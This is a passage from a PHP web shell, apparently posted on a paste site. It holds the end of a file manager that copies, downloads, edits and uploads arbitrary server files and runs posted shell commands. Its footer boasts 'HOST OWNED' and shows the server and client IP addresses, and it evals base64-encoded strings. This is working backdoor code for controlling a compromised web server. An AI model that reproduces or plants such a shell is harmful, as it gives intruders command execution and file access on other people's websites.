  4722. if (sizeof($FAILURE) > 0) {
  4723.                 $MESSAGE = ERROR('NOT_COPIED', implode("\n", $FAILURE), $DEST);}
  4724. if (sizeof($SUCCESS) > 0) {
  4725.                 $MESSAGE .= NOTICE('COPIED', implode("\n", $SUCCESS), $DEST);}
  4726.             LISTING_PAGE($MESSAGE);} else {
  4727. if (!@FILE_EXISTS($DEST) && @COPY($FILE, $DEST)) {
  4728.                 LISTING_PAGE(NOTICE('COPIED', $FILE, $DEST));} else {
  4729.                 LISTING_PAGE(ERROR('NOT_COPIED', $FILE, $DEST));}}} else {
  4730.  HTML_HEADER();
  4731. ///////// COPY FILES
  4732. echo '<form action="' . $self . '?Mister=FILES" method="post">';
  4733. $MISTERKLIO3 = "<br><table class='dialog' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;'><tr><td><center>";
  4734. echo ''. $MISTERKLIO3 .'' ;
  4735.         REQUEST_DUMP();
  4736. echo "\n<b>" . word('COPY_FILES') . '</b><p>';
  4737. foreach ($FILES as $FILE) {
  4738. echo "\t" . html($FILE) . "<br>\n";} echo '</p>' . word('DESTINATION') . ': ';
  4739. echo '<input type="text" name="DESTINATION" size="' . textfieldsize($DIRECTORY) . '" value="' . html($DIRECTORY) . '" />';
  4740. $MKBR1 = "<br><br>"; echo "". $MKBR1 ."";
  4741. echo '<input type="submit" class="Mister-button" value="' . word('COPY') . '" /><p>';
  4742. echo '</p><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '">[ ' . word('BACK') . ' ]</a>';
  4743. $MISTERKLIO1 = "<br><br></td></tr></table></form>"; echo ''. $MISTERKLIO1 .'' ;
  4744. HTML_FOOTER();}
  4745. /////////// DOWNLOAD
  4746.     break;
  4747. case 'DOWNLOAD':
  4748.     header('Pragma: public');
  4749.     header('Expires: 0');
  4750.     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  4751.     header('Content-Type: ' . getmimetype($FILE));
  4752.     header('Content-Disposition: attachment; FILENAME=' . basename($FILE) . ';');
  4753.     header('Content-Length: ' . FILESIZE($FILE));
  4754.     READFILE($FILE);
  4755.     break;
  4756. ///////// EDIT
  4757. case 'EDIT':
  4758. if (!empty($_POST['SAVE'])) {
  4759.         $content = str_replace("\r\n", "\n", $_POST['content']);
  4760. if (($f = @fopen($FILE, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
  4761.             LISTING_PAGE(NOTICE('SAVED', $FILE));} else {
  4762.             LISTING_PAGE(error('NOT_SAVED', $FILE));}} else {
  4763. if (@IS_READABLE($FILE) && @IS_WRITABLE($FILE)) {
  4764.             EDIT($FILE); } else {
  4765.             LISTING_PAGE(error('NOT_EDITED', $FILE));}}
  4766.  
  4767. break;
  4768. default: LISTING_PAGE(); }
  4769. echo '<br><br><br><br>'. $THEEND .'' ;
  4770. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|';
  4771. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4772. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4773. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4774. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  4775. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4776. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  4777. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4778. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4779. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4780. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4781. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4782. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4783. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  4784. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4785. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4786. echo ''. $REPORTERROR .'</a></span></footer>';
  4787. exit;}
  4788. $TABLE1 = '<center><table width="100%" border="0"  cellspacing="5" style="background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;"><tr>';
  4789. echo ''. $TABLE1 .'' ; DIRMISTER_K ($DIR); 
  4790. $TD1 = '<td align="center" valign="bottom" style="background:#0000F0;"><textarea rows="20" cols="20" style="width:90%;">';
  4791. echo ''. $TD1 .'' ;
  4792. ////////// COMMAND
  4793. if (!$_POST['COMMAND'] == ''){ EXMISTER_K (); } FOTMISTER_K($MK_TEXT,$MK_TEXT1,$DIR);
  4794. $UPLOADFILE = "<b> UPLOAD FILE : </b>";
  4795. $NAV1 = base64_decode("PG5hdiBjbGFzcz0iTWlzdGVyLW5hdiIgd2lkdGg9Ijk5JSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjAiIHN0eWxlPSJtYXJnaW46NXB4MDsiPg==/");
  4796. echo ''. $NAV1 .'' ;
  4797. $FROM1 = "<br><center><form method='POST' enctype='multipart/form-data' style='background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;border:1px solid #4D4D4D;'>"; echo ''. $FROM1 .'' ;
  4798. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4799. $SPAN1 = '<span style="color:#FFFFFF;font-family: "Aldrich", Tahoma, sans-serif;font-size:10px;">'; echo ''. $SPAN1 .'' ;
  4800. echo  ''. $UPLOADFILE .'</b><input type="FILE" name="MKUP" style="font-family: "Aldrich", Tahoma, sans-serif;font-size:10px;">' ;
  4801. echo "<input type='text' name='DIR' value='$DIR' style='width:40%;color:white;font-family:Aldrichfont-size:10px;'>";
  4802. $INPUT1 = '<input type="submit" class="Mister-button" value="UPLOAD"></form></nav></center>';
  4803. echo ''. $INPUT1 .'' ;
  4804. echo '<br><center>'. $MK_TEXT .''; echo''. $MK_TEXT1 .'<br></center>';
  4805.  
  4806. //////// MY RIGHT
  4807. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'';
  4808. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4809. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4810. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4811. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  4812. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4813. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  4814. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4815. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4816. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4817. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4818. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4819. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwMCc+IOKesiA8L3NwYW4+/"));
  4820. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  4821. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4822. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4823. echo ''. $REPORTERROR .'</a></span></footer>'; echo ''. $THEEND .'' ;
  4824. ///// EXIT;
  4825.  
  4826. ?>
Add Comment
Please, Sign In to add comment